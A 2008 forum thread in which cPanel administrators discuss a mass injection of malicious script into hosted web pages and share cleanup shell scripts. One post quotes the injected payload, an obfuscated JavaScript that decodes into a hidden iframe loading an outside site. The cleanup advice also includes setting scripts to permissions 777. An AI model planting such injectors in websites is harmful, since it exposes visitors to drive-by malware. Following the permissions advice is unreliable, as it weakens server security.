The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Website Hacked.

Discussion in 'Security' started by ManojB, Oct 19, 2008.

  1. ManojB

    ManojB Well-Known Member

    Joined:
    Mar 25, 2005
    Messages:
    80
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    pune
    Hello,

    I am getting the following error message on my website :

    I have investigated and found that all my php pages contains the following tags :

    It seems all my files has been corrupted, as I have manually removed this tags but still same problem. How can I overcome this problem. (suPHP has been disabled on my server)
     
    #1 ManojB, Oct 19, 2008
    Last edited: Oct 19, 2008
  2. Bartuc

    Bartuc Member

    Joined:
    Jan 9, 2008
    Messages:
    11
    Likes Received:
    0
    Trophy Points:
    1
    probably a virus on your computer causes this problem. You should run virus scan on your own pc. This virus inserts this code on your webpages via FTP. Best solution is formatting and reinstalling windows on your PC, changing your cpanel password and then manually cleaning these codes.
     
  3. oanielsen

    oanielsen Member

    Joined:
    May 14, 2003
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    This is a cpanel hack of sometype. it is in all the domains, and this code is also within the /cpapachebuild/buildapache/mhash/ directories too. It is ALL over the place. The whole server is infected with this.
     
  4. ManojB

    ManojB Well-Known Member

    Joined:
    Mar 25, 2005
    Messages:
    80
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    pune
    It seems its problem with the latest cpanel release as my phpmyadmin was also infected.
     
  5. oanielsen

    oanielsen Member

    Joined:
    May 14, 2003
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    I spent almost 13 hours today figuring out a way to clean it up.

    Lots of Shell and SED scripting!

    Very frustrating.
     
  6. ManojB

    ManojB Well-Known Member

    Joined:
    Mar 25, 2005
    Messages:
    80
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    pune
    Hello Oanielsen,

    Can you please let me know how you have removed this from your files.
     
  7. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,381
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    What was the ownership and permissions of the files that were infected?

    If the files were owned by root and had permissions of 0644, then you could be looking at a root level compromise. If root has been compromised you need to do a full system restore.
     
  8. deieno

    deieno Well-Known Member

    Joined:
    Nov 16, 2003
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Floripa - Brazil
    Hi,
    I am with the same problem, one server on LT was hacked ( could be cause LT's data base was hacked, again?) ?

    Anyone know how to strip the malicious tags?

    I found this script: http://forums.cpanel.net/showpost.php?p=309725&postcount=241

    But, what should be the regex to match this malicous code:

    <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result); </script>
    </html> </body>
     
  9. oanielsen

    oanielsen Member

    Joined:
    May 14, 2003
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    All the servers we had compromised were at LT also. It was on servers we had never had a trouble ticket on, so it was not because of un-enrypted e-mail. This was definately a direct database hack on the part LT. Make sure you change all your passwords on Servers at LT ASAP.

    Here is the fix we used.

    1. Download and install RPL http://www.laffeycomputer.com/rpl.html
    2. There are 2 script files we had to create.
    First Script we named fixhack.sh has the following code in it.
    Code:
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="                                                =jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1                                                ?=0jgsbnf?"; var result = "";' ''  *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'for(var i=0;i<source.length;i++) r                                                esult+=String.fromCharCode(source.charCodeAt(i)-1);' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>'                                                 '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> <html> <body><scri                                                pt>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu                                                >2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="                                                =jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1                                                ?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>'                                                 '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> </body>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="                                                =jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1                                                ?=0jgsbnf?"; var result = "";' '' *
    
    What that code is doing is running the RPL command for each of the lines you are wanting to find, and replacing the specified text with a NULL.

    The next shell script executes the previous script and recurses through all the directories. EAch of these scripts we ran from the /home directory. Once you download RPL you will notice that it has a Recursive option, but it will bring your server to its knees, so it is better to use this script to do the recursion for you. We named the following piece of code recursehack.sh

    Code:
    find /home -type d | while read DIRNAME
    do
    cd $DIRNAME
    /home/fixhack.sh
    done
    
    3. Make sure you CHMOD these scripts to 777
    4. Execute ./recursehack.sh from the /home directory
    5. We found that some of the things in the Cpanel directories were also infected. So, you need to run /scripts/upcp --force
    6. You will also find a new directory at the root of your server called something like "pons" or something like that. Do an ls -ltr at the root of your server and you will see a new directory there. Within this directory is a file called "framer.htm" which is the code that was injected into each page, and another script file that did all the dirty work.

    Hope this helps someone else. It definately kicked our *sses for a few hours.
     
  10. deieno

    deieno Well-Known Member

    Joined:
    Nov 16, 2003
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Floripa - Brazil
    oanielsen,

    thank you very much to share this script....
    I'll run this right now

    Our problem was exactly the same, root had the pons's folder with the same content.

    I'll move my servers from LT ASAP. This kind of trouble donĀ“t justify the raised prices :-(
     
  11. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,279
    Likes Received:
    36
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    Who is LT?
     
  12. deieno

    deieno Well-Known Member

    Joined:
    Nov 16, 2003
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Floripa - Brazil
  13. BND

    BND Registered

    Joined:
    Nov 11, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    How to install this rpl? Please urgently. My 300 sites was hacked.
     
  14. lngtanseco

    lngtanseco Well-Known Member

    Joined:
    Jun 9, 2006
    Messages:
    64
    Likes Received:
    0
    Trophy Points:
    6
    Suggest that you check first if your server is rooted. If it is, you need OS reload and recover all your sites from backup.
     
Loading...

Share This Page